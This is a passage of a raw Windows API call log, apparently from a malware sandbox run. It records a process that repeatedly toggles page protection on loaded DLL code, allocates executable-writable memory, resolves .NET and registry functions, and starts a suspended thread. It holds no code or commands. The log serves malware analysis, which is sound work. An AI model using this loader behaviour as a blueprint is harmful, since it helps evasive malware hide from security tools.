(in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100180, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.724] GetCurrentProcess () returned 0xffffffff [0068.724] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100194, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.724] GetCurrentProcess () returned 0xffffffff [0068.724] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100194, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.724] GetCurrentProcess () returned 0xffffffff [0068.724] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751001a4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.725] GetCurrentProcess () returned 0xffffffff [0068.725] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751001a4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.725] GetCurrentProcess () returned 0xffffffff [0068.725] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751001d4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.725] GetCurrentProcess () returned 0xffffffff [0068.725] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751001d4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.725] GetCurrentProcess () returned 0xffffffff [0068.725] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751001d8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.725] GetCurrentProcess () returned 0xffffffff [0068.725] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751001d8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.726] GetCurrentProcess () returned 0xffffffff [0068.726] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100200, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.726] GetCurrentProcess () returned 0xffffffff [0068.726] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100200, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.726] GetCurrentProcess () returned 0xffffffff [0068.726] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100238, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.726] GetCurrentProcess () returned 0xffffffff [0068.726] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100238, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.726] GetCurrentProcess () returned 0xffffffff [0068.726] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100244, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.727] GetCurrentProcess () returned 0xffffffff [0068.727] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100244, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.727] GetCurrentProcess () returned 0xffffffff [0068.727] GetCurrentProcess () returned 0xffffffff [0068.727] GetCurrentProcess () returned 0xffffffff [0068.727] GetCurrentProcess () returned 0xffffffff [0068.727] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.728] GetCurrentProcess () returned 0xffffffff [0068.728] GetCurrentProcess () returned 0xffffffff [0068.728] GetCurrentProcess () returned 0xffffffff [0068.728] GetCurrentProcess () returned 0xffffffff [0068.728] GetCurrentProcess () returned 0xffffffff [0068.728] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 0 [0068.729] CloseHandle (hObject=0x110) returned 1 [0068.729] VirtualAlloc (lpAddress=0x22b4000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x40) returned 0x22b4000 [0068.730] VirtualFree (lpAddress=0x22bc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0068.730] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1c08, cbMultiByte=11, lpWideCharStr=0x6ee774, cchWideChar=2047 | out: lpWideCharStr="mscoree.dllF5C䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆Ա±n䘨盤ּ±nV") returned 11 [0068.731] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="mscoree.dll", cchWideChar=11, lpMultiByteStr=0x6ee774, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscoree.dll", lpUsedDefaultChar=0x0) returned 11 [0068.731] RtlInitString (in: DestinationString=0x6ef74c, SourceString="_CorExeMain" | out: DestinationString="_CorExeMain") [0068.731] LdrGetProcedureAddress (in: BaseAddress=0x75620000, Name="_CorExeMain", Ordinal=0x0, ProcedureAddress=0x6ef754 | out: ProcedureAddress=0x6ef754*=0x75624ddb) returned 0x0 [0068.731] VirtualFree (lpAddress=0x22b4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0068.732] VirtualFree (lpAddress=0x22b8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0068.732] VirtualAlloc (lpAddress=0x22c4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x22c4000 [0068.733] VirtualFree (lpAddress=0x22c4000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0068.734] VirtualAlloc (lpAddress=0x22c4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x22c4000 [0068.735] VirtualFree (lpAddress=0x22c4000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0068.735] VirtualQuery (in: lpAddress=0xc2000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc2000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.735] VirtualQuery (in: lpAddress=0xca000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xca000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.735] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xcc000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.737] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0068.737] VirtualQuery (in: lpAddress=0xc2000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc2000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.737] VirtualQuery (in: lpAddress=0xca000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xca000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.738] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xcc000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.738] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0068.738] VirtualAlloc (lpAddress=0x22c4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x22c4000 [0068.739] VirtualFree (lpAddress=0x22c4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0068.739] VirtualAlloc (lpAddress=0x22c4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x22c4000 [0068.741] VirtualFree (lpAddress=0x22c4000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0068.741] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.741] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0068.742] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.742] VirtualAlloc (lpAddress=0x22c4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x22c4000 [0068.742] VirtualProtect (in: lpAddress=0xc0000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x6ef810 | out: lpflOldProtect=0x6ef810*=0x2) returned 1 [0068.742] VirtualProtect (in: lpAddress=0xc0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x6ef814 | out: lpflOldProtect=0x6ef814*=0x4) returned 1 [0068.743] VirtualProtect (in: lpAddress=0xc0000, dwSize=0x400, flNewProtect=0x40, lpflOldProtect=0x6ef814 | out: lpflOldProtect=0x6ef814*=0x2) returned 1 [0068.743] VirtualProtect (in: lpAddress=0xc0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x6ef814 | out: lpflOldProtect=0x6ef814*=0x40) returned 1 [0068.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd41e0, lpParameter=0x2282688, dwCreationFlags=0x4, lpThreadId=0x22d3960 | out: lpThreadId=0x22d3960*=0xbe8) returned 0x110 [0068.744] GetLocalTime (in: lpSystemTime=0x6ef7ec | out: lpSystemTime=0x6ef7ec*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2, wMilliseconds=0x1bc)) [0068.744] ResumeThread (hThread=0x110) returned 0x1 [0068.744] SetTimer (hWnd=0x0, nIDEvent=0x1, uElapse=0xf43, lpTimerFunc=0x1bdcf0) returned 0x7f9b [0068.744] VirtualQuery (in: lpAddress=0xc2000, lpBuffer=0x6ef804, dwLength=0x1c | out: lpBuffer=0x6ef804*(BaseAddress=0xc2000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x7000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0068.744] VirtualQuery (in: lpAddress=0xca000, lpBuffer=0x6ef804, dwLength=0x1c | out: lpBuffer=0x6ef804*(BaseAddress=0xca000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.744] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0x6ef804, dwLength=0x1c | out: lpBuffer=0x6ef804*(BaseAddress=0xcc000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0068.744] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x6ef804, dwLength=0x1c | out: lpBuffer=0x6ef804*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0068.745] VirtualFree (lpAddress=0x22d4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0068.745] VirtualQuery (in: lpAddress=0xc2000, lpBuffer=0x6ef804, dwLength=0x1c | out: lpBuffer=0x6ef804*(BaseAddress=0xc2000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x7000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0068.745] VirtualQuery (in: lpAddress=0xca000, lpBuffer=0x6ef804, dwLength=0x1c | out: lpBuffer=0x6ef804*(BaseAddress=0xca000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.745] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0x6ef804, dwLength=0x1c | out: lpBuffer=0x6ef804*(BaseAddress=0xcc000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0068.745] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x6ef804, dwLength=0x1c | out: lpBuffer=0x6ef804*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0068.861] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1b68, cbMultiByte=12, lpWideCharStr=0x6ee478, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dllnọ矋Ḕ\x13￾￿鞮矇겵矇") returned 12 [0068.861] SysReAllocStringLen (in: pbstr=0x6ef47c*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x6ef47c*="ADVAPI32.dll") returned 1 [0068.861] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0068.861] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0068.862] GetLastError () returned 0x0 [0068.862] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x77711520, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.862] GetCurrentProcess () returned 0xffffffff [0068.862] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x77711520, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.862] GetCurrentProcess () returned 0xffffffff [0068.862] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x77711540, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.863] GetCurrentProcess () returned 0xffffffff [0068.863] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x77711540, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.863] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x7771175c, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.863] GetCurrentProcess () returned 0xffffffff [0068.863] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x7771175c, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.863] GetCurrentProcess () returned 0xffffffff [0068.863] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x77711768, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.863] GetCurrentProcess () returned 0xffffffff [0068.863] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x77711768, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.864] GetCurrentProcess () returned 0xffffffff [0068.864] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x777117b8, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.864] GetCurrentProcess () returned 0xffffffff [0068.864] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x777117b8, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.864] GetCurrentProcess () returned 0xffffffff [0068.864] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x777117bc, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.864] GetCurrentProcess () returned 0xffffffff [0068.864] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x777117bc, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.864] GetCurrentProcess () returned 0xffffffff [0068.864] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x777117c8, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.865] GetCurrentProcess () returned 0xffffffff [0068.865] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x777117c8, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.865] GetCurrentProcess () returned 0xffffffff [0068.865] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x777117d0, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.865] GetCurrentProcess () returned 0xffffffff [0068.865] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x777117d0, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.865] GetCurrentProcess () returned 0xffffffff [0068.865] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x7771180c, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.865] GetCurrentProcess () returned 0xffffffff [0068.865] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x7771180c, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.866] GetCurrentProcess () returned 0xffffffff [0068.866] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x7771182c, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.866] GetCurrentProcess () returned 0xffffffff [0068.866] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x7771182c, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.866] GetCurrentProcess () returned 0xffffffff [0068.866] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x77711860, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x4, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x20) returned 0x0 [0068.866] GetCurrentProcess () returned 0xffffffff [0068.866] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef460*=0x77711860, NumberOfBytesToProtect=0x6ef464, NewAccessProtection=0x20, OldAccessProtection=0x6ef498 | out: BaseAddress=0x6ef460*=0x77711000, NumberOfBytesToProtect=0x6ef464, OldAccessProtection=0x6ef498*=0x4) returned 0x0 [0068.867] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryInfoKeyW") returned 0x777246e7 [0068.868] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyExW") returned 0x777246c8 [0068.869] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumValueW") returned 0x777248cc [0068.869] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0068.870] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0068.870] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0068.877] SysReAllocStringLen (in: pbstr=0x6ef344*=0x0, psz="mscoreei.dll", len=0xc | out: pbstr=0x6ef344*="mscoreei.dll") returned 1 [0068.877] CharLowerBuffW (in: lpsz="mscoreei.dll", cchLength=0xc | out: lpsz="mscoreei.dll") returned 0xc [0068.877] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", hFile=0x0, dwFlags=0x8) returned 0x754f0000 [0069.214] SysReAllocStringLen (in: pbstr=0x6eef7c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6eef7c*="kernel32.dll") returned 1 [0069.214] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0069.214] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0069.216] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0069.218] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0069.220] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0069.222] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0069.240] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1b68, cbMultiByte=12, lpWideCharStr=0x6edecc, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dllrs") returned 12 [0069.241] SysReAllocStringLen (in: pbstr=0x6eeed0*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x6eeed0*="ADVAPI32.dll") returned 1 [0069.241] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0069.241] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0069.241] GetLastError () returned 0x0 [0069.241] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x77711520, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.241] GetCurrentProcess () returned 0xffffffff [0069.241] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x77711520, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.241] GetCurrentProcess () returned 0xffffffff [0069.241] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x77711540, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.242] GetCurrentProcess () returned 0xffffffff [0069.242] NtProtectVirtualMemory (in: 